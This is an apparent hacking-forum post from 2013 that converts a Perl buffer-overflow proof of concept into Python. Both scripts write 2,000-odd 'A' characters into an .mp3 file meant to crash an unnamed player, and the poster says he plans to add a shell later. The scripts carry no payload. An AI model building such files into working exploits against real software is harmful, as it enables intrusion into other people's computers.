Perl Buffer Overflow Exploit Converted to Python 10-02-2013, 05:40 PM
#1
Code:
#!/usr/bin/perl
$bof = "A" x 2013;
$filename = "bof.mp3";
open (FILE,">$filename");
print FILE "$bof";
print "\ncreated!!!\n";Code:
#!/usr/bin/python
buffer = "\x41" * 2013
textfile = open("overflow.mp3" , 'w')
textfile.write(buffer)
textfile.close()I'll code a shell into it later.



















![[+]](https://sinister.li/images/modern/collapse_collapsed.png)








